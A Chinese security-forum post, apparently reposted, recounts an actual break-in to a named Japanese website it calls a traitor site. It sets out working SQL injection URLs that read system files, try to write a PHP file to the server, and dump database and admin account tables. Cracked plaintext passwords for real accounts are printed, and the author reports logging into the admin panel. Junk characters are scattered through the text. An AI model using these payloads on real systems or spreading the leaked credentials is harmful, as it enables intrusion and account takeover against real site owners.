找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3592|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

  S( }5 K& {) J: T  \
) P& h/ b& {+ c/ j, b0x01. 检测 www.zuaa.jp 收集数据4 Z. O0 A2 `( n* `

: E' E* I+ s/ g2 ^
6 p: z0 A% l9 L  l, o- Wwhatweb) V  h$ K2 u8 C3 `; F5 e: I

7 q4 }" |4 l; F. v8 V  `2 h2 V) O4 W; w; O. v" t
利用NMAP扫描3 O! d# b7 r9 g5 v# b
9 L3 C2 m; ^8 r* r: v
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* s3 o3 O- v3 {3 o+ h+ @
0x02.找注入点& y) ]& J* Y) O% A. X
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
4 x4 \: u, S* D8 S% e, N8 j4 }6 R& K7 H1 I0 s2 q1 r* \
6 e( _* ^! G" d# U
0x03.order by0 {2 r: J/ Y) x
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
! k/ v' G& U8 [- O2 z
8 l9 X) G- u, H( }: Gorder by 28报错,order by 27正常
* }- |1 ]- _  f4 H) a6 ?9 c1 o
  |5 }" o5 B6 b4 q( k' `  O- r0x04.   union手动查询% l9 m0 j; w1 a! p
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 & Y: O. q% a2 I( s
添加到 27 时正常显示
0 I0 H/ n, M- p! U( ~. u  K+ t8 L3 Z' L& f: x
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
2 ^0 m$ d; j' W2 X- o+ F$ r3 u+ i
0x05. info:$ x- e" ]! p3 m7 _
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 , h2 H. Y/ F# f; j& G7 d2 M
* D5 ^, a& F. ]
user:            root@localhost9 Z  w/ ^4 d( E# o" s( ]
database:    openpne
: w' H! z% ~7 s+ dversion:      4.1.22, R, v$ h# X. l
os:             portbld-freebsd5.4
5 K/ i9 ~: t7 z* ]7 d
9 Z# i$ Q2 t+ _0 d/ |+ v5 Q0x06. root用户
/ k4 Z: z1 G3 W+ H利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)& w3 B# x5 a* a. X2 g4 M* ~4 r
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
1 Q: K4 g# R! S8 Z+ R, U- V7 R
( _% e6 b! C+ F) J通过工具转换
$ I" r. [! E2 B6 e8 y3 N; A
( d/ v5 q0 j8 Z, Z: O中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
2 @) F% X% n. c# \) u) o
- [, _& J. K3 V: G9 x0x07. 利用 into outfile
& _' }- X+ ]0 g1 P. o- o全部都失败
. R+ @) G* n; _" I. Zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
& K% P" h% y- {% }
# }) `/ i+ D( \4 k. Vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php " o( x6 c" [; [# D9 t
/ R% {, Z' e" l; ~
页面显示“MDB2 Error:syntax error”
) {/ U  @$ i" ]* R" @( A' b- x5 }* `4 r5 V: ~9 ^& v$ |0 p9 j5 c
0x08. 利用 mysql 4.1
7 E/ m6 [7 x' l0 k4 u: [) e猜常规表名,字段未果 工具 sqlmap
: d9 Z( t1 C; B' z  j( |* v! M2 @中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
/ d1 v$ K% E5 P7 f! {9 m1 ]/ S" z! j* S! t6 j$ D. `9 u5 ]

$ J; [, ?6 _2 e) |, P: J, q' V" v7 T9 |4 y  B7 A- e$ |9 j6 Q
0x09. 查找后台2 z" O) C0 @' a; Z3 q9 K) x0 C
利用 现有的各种 后台工具尝试都不行
" S% |% S: C5 ^" g" c# S# K7 ^3 N1 }% f
0x10.  MySL外联方法, R* ?& X% \8 J( ^- e( \0 ]
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
- {7 J2 n7 r' f: I* }5 m可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
% e% j' X5 k4 J0 c9 p. j# M/ ^http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user. N8 R, u- r5 G$ e2 c* x

* G5 l& s$ e" I) @: n9 P& A这个可以在 www.cmd5.com 解密6 o9 j1 H, y& [3 @
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
3 }% U1 O  A  echen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
, X' _3 }0 y8 T# r$ U4 dopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???( a$ ^; G+ P3 G, W1 i) D
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???3 D- O! x& |, [6 X) ~! h' @' I
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
- O( m5 v" D4 @$ L1 A0 s0 q  g9 ?
7 ?7 ^7 p% e9 V: `$ d) Q+ Z( w
6 I$ I6 ?! f+ s6 ^* N  q+ D: Y0x11. 网站突破" }+ j" S  Q% U2 D
发现网站的源程序 openpne, google 下载 openpne 源码
2 E& J" Q- r  W9 C5 y$ U0 d% F0 k" [4 l5 S
/ S5 a) R7 d8 o+ @3 f5 T- Y9 W
0x12. 默认信息利用1 ?( p. `2 [0 ^. |( R# ^8 H4 |# P
http://sns.zuaa.jp/?m=admin&a=page_login
, E& o- v. W+ Q: P/ H0 c
; I! v  ~$ D& t2 i! W表名 (c_admin_user) ,字段名(username,password)5 z; @4 Y( R  @0 U5 n3 s6 N
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user" J/ Y) a, f4 a6 ]. r9 L
8 c) l& W1 q& x* U* M
解密8 }3 f0 C- N2 y' l& Z6 }$ D5 d
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
7 m* }5 T+ a, I: K& D& vzuaajp:c0923ec5857796a393da99905008c176,          zju1897
1 b6 P3 ~  o$ J- {+ C1 `; H3 E; C8 ]1 p) Z# `/ p* Q# v: }( G" M
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持4 U& e5 l# i+ {# ]% i- x- R- P
1 Y1 u# h' y' G# a  X7 p) P# x7 t& G' h6 w& [
0x13. 登录后台
$ r/ T* o6 b% r* y" Y
( j; l9 W$ d, N5 ^, Z, v& j( U# |: L0 W5 v4 j
$ H$ P$ h3 E, w
0x14. 小结
4 _9 e( k$ g& t. W( _/ U# k6 D利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
5 x% K( T5 E. a2 {感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点, M2 {% l3 ?+ a( k8 N/ q; ~
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain, P+ U/ Q' A7 B; c7 x
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 X; y% V& z/ |# O, M( p
2 o7 c. A6 A6 ^1 q( D  x1 Y
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!/ O. y# F, z- u

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表